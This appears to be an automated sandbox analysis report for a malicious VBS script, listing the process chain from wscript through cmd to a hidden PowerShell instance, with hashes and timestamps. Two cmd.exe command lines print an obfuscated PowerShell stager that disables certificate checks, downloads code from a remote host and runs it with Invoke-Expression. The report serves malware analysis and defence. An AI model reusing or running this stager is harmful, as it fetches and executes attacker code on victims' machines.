                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs"
                                                        Imagebase:0x7ff6860b0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true
                                                        Show Windows behavior

                                                        File Activities

                                                        Show Windows behavior

                                                        Section Activities

                                                        Show Windows behavior

                                                        Registry Activities

                                                        Show Windows behavior

                                                        COM Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Thread Activities

                                                        Show Windows behavior

                                                        Memory Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Windows UI Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        General

                                                        Target ID:2
                                                        Start time:10:20:17
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
                                                        Imagebase:0x7ff70c650000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true
                                                        Show Windows behavior

                                                        File Activities

                                                        Show Windows behavior

                                                        Section Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Process Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Memory Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        General

                                                        Target ID:3
                                                        Start time:10:20:18
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true
                                                        Show Windows behavior

                                                        File Activities

                                                        Show Windows behavior

                                                        Section Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Mutex Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Thread Activities

                                                        Show Windows behavior

                                                        Memory Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Windows UI Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        General

                                                        Target ID:4
                                                        Start time:10:20:18
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "
                                                        Imagebase:0x7ff70c650000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true
                                                        Show Windows behavior

                                                        File Activities

                                                        Show Windows behavior

                                                        Section Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        General

                                                        Target ID:5
                                                        Start time:10:20:18
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
                                                        Imagebase:0xb60000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true
                                                        Show Windows behavior

                                                        File Activities

                                                        Show Windows behavior

                                                        Section Activities

                                                        Show Windows behavior

                                                        Registry Activities

                                                        Powershell Activities

                                                        Show Windows behavior

                                                        Mutex Activities

                                                        Show Windows behavior

                                                        Process Activities

                                                        Show Windows behavior

                                                        Thread Activities

                                                        Show Windows behavior

                                                        Memory Activities

                                                        Show Windows behavior

                                                        System Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        Show Windows behavior

                                                        Windows UI Activities

                                                        Process Token Activities

                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        Disassembly

                                                        No disassembly